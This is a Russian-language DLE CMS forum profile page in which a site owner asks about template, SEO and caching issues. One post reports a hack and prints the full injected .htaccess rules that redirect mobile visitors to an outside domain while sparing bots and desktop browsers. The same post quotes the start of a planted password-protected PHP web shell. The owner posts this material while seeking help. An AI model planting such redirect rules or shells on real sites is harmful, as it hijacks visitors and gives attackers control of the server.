Valet777
-
Публикации
32 -
Зарегистрирован
-
Посещение
Сообщения, опубликованные пользователем Valet777
-
-
49 минуты назад, germanydletest сказал:
Проверяем компьютер на вирусы. Меняем пароли ftp, mysql, аккаунт хостинга, e-mail. Удаляем все сторонние модули. Выставляем правильные права на файлы и папки 755/644 (вполне достаточно для работы DLE).
Вы правы, все это я сделаю, но хотелось бы знать, не сталкивался ли кто с подобным явлением ?
-
Здравствуйте, благодаря пользователям сайта обнаружил, что если заходить на сайт с мобильной платформы - идет редирект на неизвестный сайт. Я подумал, снова php инъекция и начал искать проблму, оказалось что проблема не в коде, а только в .htaccess файле.
Я убрал вредоносные строки, заменив файл из бекапа, но я более чем уверен что это поможет не на долго, т.к где то есть дырка, а откуда дует - я не могу понять. Я прилажу файл .htaccess, возможно это что то даст. Возможно это вовсе не проблемы движка, а просто timeweb.ru - снова шалят, т.к месяце назад они уже устроили мне приятный сюрприз, дав возможность неизвестным лицам спокойно менять NS записи доменов.
Пациент: itop-gear.ru
Дополняю:
Нашел файл head.php - который мне вообще не известен, если запускаю его с браузера - просит ввести пароль, что это такое я вообще не имею понятий. Находится в корневой папке
<?PHP $auth_pass = "6q3a19fds0ea7aabbsd918s05017936b2649e85481845"; $color = "#ddff55"; $default_use_ajax = true; $default_charset = 'Windows-1251'; $default_action='Bruteforce'; $o = "здесь очень большая куча кода
Вредоносный код который был в файле .htaccess
RewriteEngine on RewriteCond %{HTTP_USER_AGENT} android [NC,OR] RewriteCond %{HTTP_USER_AGENT} opera\ mini [NC,OR] RewriteCond %{HTTP_USER_AGENT} blackberry [NC,OR] RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR] RewriteCond %{HTTP_USER_AGENT} (pre\/|palm\ os|palm|hiptop|avantgo|plucker|xiino|blazer|elaine) [NC,OR] RewriteCond %{HTTP_USER_AGENT} (iris|3g_t|windows\ ce|opera\ mobi|windows\ ce;\ smartphone;|windows\ ce;\ iemobile) [NC,OR] RewriteCond %{HTTP_USER_AGENT} (mini\ 9.5|vx1000|lge\ |m800|e860|u940|ux840|compal|wireless|\ mobi|ahong|lg380|lgku|lgu900|lg210|lg47|lg920|lg840|lg370|sam-r|mg50|s55|g83|t66|vx400|mk99|d615|d763|el370|sl900|mp500|samu3|samu4|vx10|xda_|samu5|samu6|samu7|samu9|a615|b832|m881|s920|n210|s700|c-810|_h797|mob-x|sk16d|848b|mowser|s580|r800|471x|v120|rim8|c500foma:|160x|x160|480x|x640|t503|w839|i250|sprint|w398samr810|m5252|c7100|mt126|x225|s5330|s820|htil-g1|fly\ v71|s302|-x113|novarra|k610i|-three|8325rc|8352rc|sanyo|vx54|c888|nx250|n120|mtk\ |c5588|s710|t880|c5005|i;458x|p404i|s210|c5100|teleca|s940|c500|s590|foma|samsu|vx8|vx9|a1000|_mms|myx|a700|gu1100|bc831|e300|ems100|me701|me702m-three|sd588|s800|8325rc|ac831|mw200|brew\ |d88|htc\/|htc_touch|355x|m50|km100|d736|p-9521|telco|sl74|ktouch|m4u\/|me702|8325rc|kddi|phone|lg\ |sonyericsson|samsung|240x|x320|vx10|nokia|sony\ cmd|motorola|up.browser|up.link|mmp|symbian|smartphone|midp|wap|vodafone|o2|pocket|mobile|treo) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(1207|3gso|4thp|501i|502i|503i|504i|505i|506i|6310|6590|770s|802s|a\ wa|acer|acs-|airn|alav|asus|attw|au-m|aur\ |aus\ |abac|acoo|aiko|alco|alca|amoi|anex|anny|anyw|aptu|arch|argo|bell|bird|bw-n|bw-u|beck|benq|bilb|blac|c55\/|cdm-|chtm|capi|cond|craw|dall|dbte|dc-s|dica|ds-d|ds12|dait|devi|dmob|doco|dopo|el49|erk0|esl8|ez40|ez60|ez70|ezos|ezze|elai|emul|eric|ezwa|fake|fly-|fly_|g-mo|g1\ u|g560|gf-5|grun|gene|go\.w|good|grad|hcit|hd-m|hd-p|hd-t|hei-|hp\ i|hpip|hs-c|htc\ |htc-|htca|htcg|htcp|htcs|htct|htc_|haie|hita|huaw|hutc|i-20|i-go|i-ma|i230|iac|iac-|iac\/|ig01|im1k|inno|iris|jata|java|kddi|kgt|kgt\/|kpt\ |kwc-|klon|lexi|lg\ g|lg-a|lg-b|lg-c|lg-d|lg-f|lg-g|lg-k|lg-l|lg-m|lg-o|lg-p|lg-s|lg-t|lg-u|lg-w|lg\/k|lg\/l|lg\/u|lg50|lg54|lge-|lge\/|lynx|leno|m1-w|m3ga|m50\/|maui|mc01|mc21|mcca|medi|meri|mio8|mioa|mo01|mo02|mode|modo|mot\ |mot-|mt50|mtp1|mtv\ |mate|maxo|merc|mits|mobi|motv|mozz|n100|n101|n102|n202|n203|n300|n302|n500|n502|n505|n700|n701|n710|nec-|nem-|newg|neon|netf|noki|nzph|o2\ x|o2-x|opwv|owg1|opti|oran|p800|pand|pg-1|pg-2|pg-3|pg-6|pg-8|pg-c|pg13|phil|pn-2|pt-g|palm|pana|pire|pock|pose|psio|qa-a|qc-2|qc-3|qc-5|qc-7|qc07|qc12|qc21|qc32|qc60|qci-|qwap|qtek|r380|r600|raks|rim9|rove|s55\/|sage|sams|sc01|sch-|scp-|sdk\/|se47|sec-|sec0|sec1|semc|sgh-|shar|sie-|sk-0|sl45|slid|smb3|smt5|sp01|sph-|spv\ |spv-|sy01|samm|sany|sava|scoo|send|siem|smar|smit|soft|sony|t-mo|t218|t250|t600|t610|t618|tcl-|tdg-|telm|tim-|ts70|tsm-|tsm3|tsm5|tx-9|tagt|talk|teli|topl|hiba|up\.b|upg1|utst|v400|v750|veri|vk-v|vk40|vk50|vk52|vk53|vm40|vx98|virg|vite|voda|vulc|w3c\ |w3c-|wapj|wapp|wapu|wapm|wig\ |wapi|wapr|wapv|wapy|wapa|waps|wapt|winc|winw|wonu|x700|xda2|xdag|yas-|your|zte-|zeto|acs-|alav|alca|amoi|aste|audi|avan|benq|bird|blac|blaz|brew|brvw|bumb|ccwa|cell|cldc|cmd-|dang|doco|eml2|eric|fetc|hipt|http|ibro|idea|ikom|inno|ipaq|jbro|jemu|java|jigs|kddi|keji|kyoc|kyok|leno|lg-c|lg-d|lg-g|lge-|libw|m-cr|maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|mywa|nec-|newt|nok6|noki|o2im|opwv|palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|rozo|sage|sama|sams|sany|sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo|teli|tim-|tosh|treo|tsm-|upg1|upsi|vk-v|voda|vx52|vx53|vx60|vx61|vx70|vx80|vx81|vx83|vx85|wap-|wapa|wapi|wapp|wapr|webc|whit|winw|wmlb|xda-) [NC,OR] RewriteCond %{HTTP:Accept} (text\/vnd\.wap\.wml|application\/vnd\.wap\.xhtml\+xml) [NC,OR] RewriteCond %{HTTP:Profile} .+ [NC,OR] RewriteCond %{HTTP:Wap-Profile} .+ [NC,OR] RewriteCond %{HTTP:x-wap-profile} .+ [NC,OR] RewriteCond %{HTTP:x-operamini-phone-ua} .+ [NC,OR] RewriteCond %{HTTP:x-wap-profile-diff} .+ [NC] RewriteCond %{QUERY_STRING} !noredirect [NC] RewriteCond %{HTTP_USER_AGENT} !^(Mozilla\/5\.0\ \(Linux;\ U;\ Android\ 2\.2;\ en-us;\ Nexus\ One\ Build/FRF91\)\ AppleWebKit\/533\.1\ \(KHTML,\ like\ Gecko\)\ Version\/4\.0\ Mobile\ Safari\/533\.1\ offline)$ [NC] RewriteCond %{HTTP_USER_AGENT} !(windows\.nt|bsd|x11|unix|macos|macintosh|playstation|google|yandex|bot|libwww|msn|america|avant|download|fdm|maui|webmoney|windows-media-player) [NC] RewriteRule ^(.*)$ http://myburgerlove.ru/go/431e77f1beee06ac0f72e345b880b043 [L,R=302] -
Да, это разные страницы но с Разными комментариями, Заголовки, метатеги и все отсальное, полное дублирование страницы новости. Спасибо за пояснение.
-
Есть подгрузка комментариев через AJAX, смысл от нее, если страницы комментариев имеют отдельный URL адрес, который ПС хавает как за отдельную страницу, как поисковику пояснить что Вы задумали это как часть страницы а ен отдельный URL ?
Разве http://dle-news.ru/release/page,1,3,1644-datalife-engine-v105-final-release.html#comment
и http://dle-news.ru/release/1644-datalife-engine-v105-final-release.html
Похоже на одну страницу ?
Нет, так же и поисковик видит их как отдельный страницы, таким образом странца комментария в поиске выше чем сама страница
http://dle-news.ru/release/1644-datalife-engine-v105-final-release.html
И это не я придумал, а информация из самого же поисковика
Я рассмотрел все детальнее, как я понял, подобные ссылки имеют место быть из за того, что Бы если пользователь захочет поделиться подобной ссылкой, была такая возможность, но как по мне такая возможность не стоит того, что бы создавать дубли контента.
-
Добрый день, недавно заметил, что страницы комментариев к новости в DLE дублируют саму новость, но меняют URL адрес, таким образом если к новости написано более 20 страниц комментариев, получается целых 20 дублей страницы. Как пример, это наблюдается даже на самом оф сайте, как гугл привел меня вот на эту страницу - http://dle-news.ru/release/page,1,3,1644-datalife-engine-v105-final-release.html#comment
Как можно заметить, сама новость просто продублированна. В общем, не стал писать в раздел багов, т.к не знаю принимаете ли Вы это за баг, но это серьезный элемент, требующий вмешательства. Хотелось бы узнать, как можно избавить скрипт от подобного вида URL.
-
ну "топором" то можно отключить
отредактировать и удалить нужный <input> совсем
коряво, но если обновиться по ряду причин невозможно, это одно из средств выбора
спасибо большое
-
Она появляется не каким то образом, а вы сами это случайно ставите, когда редактируете или добавляете новость во вкладке "Дополнительно". Вы пользуетесь старой версией скрипта, и поставить там дату удаления можно случайно, прокручивая колесо мыши над данным полем. Например при скроллинге страницы, если мышь окажется над полем.
Вам нужно либо обновляться до актуальных версий скрипта, там уже введены дополнительные механизмы защиты и поставить значение в это поле случайно невозможно. Либо работать осторожно в этой вкладке.
А можно вообще как то эту функцию отключить, что бы даже случайно такого не происходило ? Я сомневаюсь что каждому своему клиенту я смогу пояснить этот момент.
-
Добрый день, все не решался написать, после случае автоматического удаления новости на сайте, первый раз когда обнаружил причину - думал сам что то сделал не так, но вот случай повторился. В новости каким то образом появляется настройка на удаление новости с сайта через определенный период, я этого не делал, лог в админ панели тому в подтверждение. Пожалуйста помогите решить проблему, возможно кто то сталкивался.
P.s - очень милый форум получился.
-
По сути не плохо, посоветовал бы сделать видимое деление между короткими новостями.
-
Добрый день, требуется веб мастер, который имеет знания для написание нескольких модулей для DLE, собственно решил обратиться на оф.форум DLE, может кто то подскажет где искать разработчиков модуля ?
-
Все работает хорошо, но один момент перестал работать корректно. Я использую подобные теги: [add-favorites] и [del-favorites] для добавления одной из новостей в закладки на сайте. В данный момент наблюдаю подобную картину, после нажатия на кнопку серия добавляется в закладки, но даже после обновления страницы страницу нельзя удалить из закладок, буд то движок не видит что серия уже добавлена в закладки, движок снова подсовывает туже кнопку - добавить в закладки, а кнопку удалить не показывает.
По всей видимости вы включили кеширование на сайте, соответственно видите информацию из кеша, а не персональную для себя. В данном случае для удаления новости из закладок, нужно зайти в раздел просмотра закладок на сайте и там удалять.
Вы лучший!!! ПОНИМАЕТЕ ЭТО ? ))))) спасибо Вам огромное СЭР! С новым годом!
-
Здравствуйте
Недавно обновил сайт, движок DLE 10.3
Все работает хорошо, но один момент перестал работать корректно. Я использую подобные теги: [add-favorites] и [del-favorites] для добавления одной из новостей в закладки на сайте. В данный момент наблюдаю подобную картину, после нажатия на кнопку серия добавляется в закладки, но даже после обновления страницы страницу нельзя удалить из закладок, буд то движок не видит что серия уже добавлена в закладки, движок снова подсовывает туже кнопку - добавить в закладки, а кнопку удалить не показывает.
Добавление работает, но даже после добавления новости в закладки кнопка "Добавить в закладки" все равно на месте, не пропадает, хотя по задумке должна пропасть, вместо нее должна появится кнопка "удалить кнопку из закладок", она не появляется.
Перерыл много, но ничего не получилось изменить
Пытался узнать, будет ли работать все как задумано на другом сайте, установил все на локальный хост (где все изначально работало) - проверил, работает как и должно. Установил движок с нуля на другой сайт на хостинге, воткнул все файлы сайт туда же, там снова все работает. А именно на моем сайте не работает. Уже не знаю что делать, прошу помощи у Вас друзья.
сайт: itop-gear.ru можно зайти под профилем Login: demo pass: demo
и наблюдать ошибку на любой странице с плеером.
Вот так выглядит код добавления в закладки на сайте:
[add-favorites]<div id="addfav"><p>Досмотреть позже</p></div>[/add-favorites]
[del-favorites]<div id="delfav"><p>Досмотрел</p></div>[/del-favorites]
-
Valet777,
Изменился формат хранения этих настроек, и в данном случае нужно обращаться к авторам этих модулей, для получения модулей совместимых с настройками актуальной версии DLE.
Благодарю за овтети, решил так. BlockPro заменил на Custom а карту сайта просто обновил, и все заработало, спасибо Вам огромное за участие!
-
-
Здравствуйте, обновил движок до последней версии, 10.3. После обновления модули BlockPro и Sitemap перестали выдавать ЧПУ ссылки (1 чпу), выдают не /2test/2-post2.html а /index.php?newsid=2, что создает дубли и т.д Помогите пожалуйста, как исправить этот косяк ?
-
Точно есть над чем поработать, сделайте редизайн, делайте ставку на удобность для читателя, у Вас на сайте такие маленькие шрифты, что я его сразу закрыть хахотел, ужасно.
-
Но нет ли возможности как то изменить этот вопрос ?
Нет, эта функциональность не предусмотрена скриптом, ее нужно писать. Готового написанного решения у меня нет.
Очень жаль, придется все в один файл вталкивать. Спасибо Вам большое за уделенное мне время, удачи Вам в работе.
-
но когда пытаются уже далее из catnav.tpl подключить еще один файл, он подключается - но не работает основной функционал.
Все верно так и должно быть. И других вариантов в данном случае нет. Теги поддерживаются только те, которые поддерживает основной шаблон из которого подключается другой файл, причем это наследование сохраняется только один раз и на один уровень. Причина этому безопасность скрипта, а также предотвращение бесконечного зацикливания, и как следствие падение сервера. Пример бесконечного зацикливания это если например в шаблоне main.tpl опять подключить main.tpl, это приведет к бесконечному циклу. Это и предотвращается. При этом имена не важны, бесконечность может получиться если из main.tpl подключить catnav.tpl а из catnav.tpl опять main.tpl
Ясно, безопасно это хорошо. Но нет ли возможности как то изменить этот вопрос ? открыть эту возможность, я ведь не враг сам себе, не буду зацикливать таким образом, просто такая возможность открыла бы для меня много способов решения многих задач
собственно и недеялся, что мне здесь подскажут как добиться этого результата 
-
Какие-то неточные у тебя описания. Обычно все остальные файлы инклудятся в main.tpl
И непонятно какой именно функционал не работает, конкретнее
Может так будет более понятно, прикладываю изображение.
Тег {info} в браузере так и будет {info}, допустим [category] Тоже будет отображаться просто как текст
-
Здравствуйте Ув.пользователи, у меня к Вам такой вопрос. В последнее время при разработке сайтов на DLE начал грешить более удобной структурой папок и т.д в самом коде. Конечно же можно хародкодить, но это не по мне. Задача следующая, есть у меня main.tpl - он инклюдится (подключается) к файлу catnav.tpl, оба файла шаблона находятся в корневой папке шаблона, в них все отлично работает, но когда пытаются уже далее из catnav.tpl подключить еще один файл, он подключается - но не работает основной функционал.
Не работаю все стандартные теги DLE(Спец теги), уже нельзя еще раз подключиться к какому либо еще файлу, и т.д. (Все введенные теги и т.д двиг просто выводит никак не обрабатывая)
Собственно, как сделать так, что бы можно было подключать .tpl файлы из разных папок и в любом кол-во и любой связке, дабы функции DLE оставались на месте ? Спасибо за внимание.
Все что на данный момент мне подсказали, это то что нужно копать в сторону templates.class.php, но честно говоря не сильно хорошо разбираюсь в php. По этому решил попросить помощи у оф.представителей.
-
Собираюсь на платной, спасибо большое
-
Здравствуйте. Вот собираюсь скоро участвовать в Чемпионате по сайтостроению, одна из главных правил, CMS должна быть с открытым исходным кодом. DLE можно считать за CMS с открытым исходным кодом ? Мнения не совпадают, помогите пожалуйста с этим вопросом, а если есть какая то документация подтверждающая это, это еще лучше, спасибо заранее.
-
Благодарю за помощь, заменил файл main, все работает
-
Вот та же проблема - http://forum.dle-news.ru/index.php?showtopic=64983&hl=thumb&fromsearch=1, но как я смотрю никто не решился помочь человеку
Ddos атакая на файл al_profileEdit.php
в В помощь вебмастеру
Опубликовано:
Приветствую,в последнее время на наш сайт производят DDOS атаки, мы настроили www.cloudflare.com, это помогает, но приходится держать систему отражения атак онлайн 24x7, что не всегда удобно.
По сообщениям из сапорта хоитинга, вредоносные запросы происходят по такому вот запросу: {domains.ru}/al_profileEdit.php?__query=edit&act=contacts&al=-1&al_id=vk, и их десятки сотен если не тысяч.
На сколько знаю, подобный запрос в DLE приведет только к ошибке, т.к подобного файла нет, и быть не может. Что могут посоветовать гуру DLE ?